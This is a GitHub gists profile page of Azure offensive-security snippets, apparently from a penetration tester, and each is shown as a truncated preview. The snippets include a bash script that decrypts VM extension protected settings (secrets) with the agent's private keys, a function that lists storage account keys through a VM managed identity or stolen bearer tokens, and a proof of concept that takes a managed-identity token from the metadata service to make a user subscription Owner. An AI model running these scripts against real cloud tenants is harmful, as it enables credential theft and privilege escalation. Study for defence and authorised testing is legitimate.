Skip to content

Instantly share code, notes, and snippets.

View kfosaaen's full-sized avatar
:octocat:

Karl Fosaaen kfosaaen

:octocat:
141 followers · 22 following
View GitHub Profile
@kfosaaen
kfosaaen / MatchPFXCertToAppRegistration.ps1
Last active October 18, 2024 15:55
MatchPFXCertToAppRegistration.ps1
<#
This is some simple PowerShell that uses the authenticated Az PowerShell functions to query Entra ID for Service Principal certificates to match them to a thumbprint.
Delete the "-Password $mypwd" if the PFX file doesn't have a password on it.
This is convenient for when you have access to a PFX file, but don't know which App Registration uses it.
#>
# Change "$PWD\testCertificate.pfx" to point to your PFX file
$pfxThumb = ((Get-PfxData "$PWD\testCertificate.pfx" -Password $mypwd).EndEntityCertificates).Thumbprint
# Iterate through each application, find their certificates, and compare the thumbprint to yours
@kfosaaen
kfosaaen / ProtectedSettingsDump.sh
Created March 13, 2024 19:25
Dump Azure Linux VM Extension Protected Settings
#!/bin/bash
# Find all ".settings" files in "/var/lib/waagent/" subdirectories
find /var/lib/waagent/ -type f -name "*.settings" -print0 | while IFS= read -r -d $'\0' file; do
thumbprint=$(jq -r '.runtimeSettings[].handlerSettings.protectedSettingsCertThumbprint' $file)
protectedSettingsDecrypted=$(jq -r '.runtimeSettings[].handlerSettings.protectedSettings' $file | base64 --decode | openssl smime -inform DER -decrypt -recip /var/lib/waagent/$thumbprint.crt -inkey /var/lib/waagent/$thumbprint.prv | jq .)
echo "File: $file"
echo "Public Settings: $publicSettings"
echo "Decrypted Protected Settings: $protectedSettingsDecrypted"
@kfosaaen
kfosaaen / AppRegRoleFinder.ps1
Created March 8, 2023 22:57
PowerShell 3-liner to find roles attached to your current user
# Get a token and split out the payload
$token = ((Get-AzAccessToken).Token).Split(".")[1].Replace('-', '+').Replace('_', '/')
# Add padding, if needed
while ($token.Length % 4) {$token += "="}
# Base64 Decode, convert from json, extract OID, pass into filter for Get-AzRoleAssignment to find current roles
Get-AzRoleAssignment | where ObjectId -EQ ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($token)) | ConvertFrom-Json).oid
@kfosaaen
kfosaaen / get-MIStorageKeys.ps1
Last active November 1, 2022 02:48
A PowerShell function to call Azure rest APIs using a VM Managed Identity to list available Storage Account access keys
Function get-MIStorageKeys{
# Author: Karl Fosaaen (@kfosaaen), NetSPI - 2020
# Description: PowerShell function for enumerating available storage account keys from a VM Managed Identity.
# Pipe to "Export-Csv -NoTypeInformation" for easier exporting
# Use the subID and ArmToken parameters to specify bearer tokens and subscriptions, handy for compromised bearer tokens from other services (CloudShell/AutomationAccounts)
[CmdletBinding()]
Param(
[Parameter(Mandatory=$false,
@kfosaaen
kfosaaen / MI-Owner-Escalation.ps1
Created February 14, 2020 21:50
A simple PoC for using an Azure Managed Identity to add a user as a Subscription Owner
#---------Query MetaData for SubscriptionID---------#
$response2 = Invoke-WebRequest -Uri 'http://169.254.169.254/metadata/instance?api-version=2018-02-01' -Method GET -Headers @{Metadata="true"} -UseBasicParsing
$subID = ($response2.Content | ConvertFrom-Json).compute.subscriptionId
#---------Get OAuth Token---------#
$response = Invoke-WebRequest -Uri 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/' -Method GET -Headers @{Metadata="true"} -UseBasicParsing
$content = $response.Content | ConvertFrom-Json
$ArmToken = $content.access_token